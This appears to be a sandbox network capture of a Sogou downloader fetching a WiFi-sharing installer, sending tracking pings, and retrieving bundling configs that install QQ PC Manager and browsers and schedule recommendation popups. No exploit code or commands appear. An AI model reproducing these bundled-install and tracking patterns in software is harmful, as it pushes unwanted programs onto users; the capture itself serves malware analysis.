Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:37 GMT
Content-Type: application/octet-stream
Content-Length: 7449413
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 4260115-11709527/11709528
<<< skipped >>>
HEAD /128128.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1564
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db80:7002 (Cdn Cache Server V2.0)
Connection: close
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=801&rand=1463641986 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:01 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&rand=1463641988 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641991 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&errortype=4&rand=1463641991 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=231&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=4&activatetype=download&rand=1463641993 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=5&servicestate=4&rand=1463641994 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641995 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=100&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463641995 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&rand=1463641995 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&errortype=1&rand=1463641995 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=SogouExplorer&weight=1&scheme=e&rand=1463641996 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=800&sogousoftware=1&updateservice=1&rand=1463641996 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=11&sogousoftware=1&updateservice=1&rand=1463641997 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Host: 58.254.134.138:80
Content-type: application/octet-stream
Content-Length: 140
Connection: Keep-Alive
A...........m..N.Jg.H)........K.J..s.=......E!&...f...a4z..>..u....A.....Lhs...C.z.H.(.W..$*.\d.._..y.......@? .h.......j..G.D.Q..B......X
HTTP/1.1 200 OK
Content-Length: 268
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=bpackage&unc=sogousoftware_normal&pcid=0&mode=recommend HTTP/1.1
User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:47 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: usid=DA60F2C22E71980A00000000573D676F; expires=Fri, 19-May-17 07:12:47 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

70e
<?xml version="1.0" encoding="utf-8"?>
<DOCUMENT>
 <bindtype><![CDATA[downloadbpackage]]></bindtype>
 <item>
  <weight><![CDATA[0]]></weight>
  <name><![CDATA[SogouSoftware]]></name>
  <description><![CDATA[..................B...]]></description>
  <installedfeature>
   <type><![CDATA[keyandpath]]></type>
   <key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\SogouSoftware]]></key>
   <valuename><![CDATA[LaunchAppPath]]></valuename>
   <file><![CDATA[]]></file>
  </installedfeature>
  <installedfeature>
   <type><![CDATA[keyandpath]]></type>
   <key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\SogouSoftware]]></key>
   <valuename><![CDATA[LaunchAppPath]]></valuename>
   <file><![CDATA[]]></file>
  </installedfeature>
  <appcheckurl><![CDATA[hXXp://t.sogou.com/update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0]]></appcheckurl>
  <appcheckreporturl><![CDATA[hXXp://t.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1]]></appcheckreporturl>
  <url><![CDATA[hXXp://yze.t.sogou.com/externalapp/SogouSoftwareExternalApp.exe]]></url>
  <md5><![CDATA[c7fe7beca3334f0ff703cee41ddf1ad0]]></md5>
<<< skipped >>>
GET /handleUserIdDb?userid=182290f2326cb222d4f13e5ed25565ed&unc=sogousoftware_normal&mode=recommend HTTP/1.1
User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

37d
<?xml version="1.0" encoding="utf-8"?>
<PopupRecommend>
 <Global>
  <MinPopupIntervalS>1800</MinPopupIntervalS>
 </Global>
 <RecommendMultiple Enable="true">
  <ExecuteWhenStart>1</ExecuteWhenStart>
  <WaitMinS>180</WaitMinS>
  <WaitMaxS>480</WaitMaxS>
  <MinPopupIntervalS>64800</MinPopupIntervalS>
  <AutoCloseIntervalS>60</AutoCloseIntervalS>
 </RecommendMultiple>
 <RecommendSingle>
  <WhenSoftwareRun Enable="true" Type="Client">
   <BlackList>123,456</BlackList>
   <SamePcidMinPopupIntervalS>86400</SamePcidMinPopupIntervalS>
   <AutoCloseIntervalS>60</AutoCloseIntervalS>
  </WhenSoftwareRun>
  <AfterSoftwareInstall Enable="true" Type="Web">
   <ConfigUrl>hXXp://yze.t.sogou.com/cooperation/popuprecommend/installfinishbind-qqbrowser.xml</ConfigUrl>
   <AutoCloseIntervalS>60</AutoCloseIntervalS>
  </AfterSoftwareInstall>
 </RecommendSingle>
</PopupRecommend>
0
GET /softRanking HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=aaaBCX7sZraLvhokg3htv; path=/
<<< skipped >>>
GET /softassis/js/jquery-1.7.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/x-javascript
Content-Length: 94840
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-17278"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
<<< skipped >>>
GET /js/scroll.js?vs=03 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: application/x-javascript
Content-Length: 7035
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-1b7b"
Expires: Sun, 22 May 2016 07:13:14 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
<<< skipped >>>
GET /img/recommend-btn.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error

3f
The URL has moved <a href="hXXp://xz.sogou.com/error">here</a>
0
GET /img/recommend-btn.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error

3f
The URL has moved <a href="hXXp://xz.sogou.com/error">here</a>
0
GET /softassis/img/loading.gif HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:17 GMT
Content-Type: image/gif
Content-Length: 12162
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-2f82"
Expires: Sun, 22 May 2016 07:13:17 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
<<< skipped >>>
GET /softRanking/loadMore?pageSize=10&pageNo=1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: hXXp://xz.sogou.com/softRanking
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<<< skipped >>>
GET /softassis/img/ranking-ico.png HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GET /softassis/img/ranking-ico.png HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11578455
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=software&unc=sogousoftware_normal&pcid=2320808333768086190&mode=recommend HTTP/1.1
User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
ca5
<?xml version="1.0" encoding="utf-8"?>
<DOCUMENT>
  <bindtype><![CDATA[thirdparty_pcmgr_qb]]></bindtype>
  <item>
    <weight><![CDATA[0]]></weight>
    <name><![CDATA[pcmgr]]></name>
    <description><![CDATA[.....................QQ.........]]></description>
    <installedfeature>
      <type><![CDATA[keyandpath]]></type>
      <key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQPCMgr]]></key>
      <valuename><![CDATA[InstallDir]]></valuename>
    </installedfeature>
    <appcheckurl><![CDATA[hXXp://t.sogou.com/update_platform/update.php?appname=sogoudownload_bindpcmgrcontrol&v=1.0.0.0]]></appcheckurl>
    <appcheckreporturl><![CDATA[hXXp://t.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindpcmgrcontrol&state=1]]></appcheckreporturl>
    <url><![CDATA[hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/SuiteDownloader20160222153349.exe]]></url>
    <md5><![CDATA[962ab6923623cfa37d0e7133c7a9d0bb]]></md5>
    <installparam><![CDATA[]]></installparam>
    <silentinstall><![CDATA[false]]></silentinstall>
    <installprivilege><![CDATA[true]]></installprivilege>
    <installtype><![CDATA[installpackage]]></installtype>
    <installpackage>
      <url><![CDATA[hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/d<<< skipped >>>
GET /softRecommend HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=aaanEMDtrFcWQ8kkg3htv; path=/
GET /softassis/css/recommend.css?vs=1.0 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
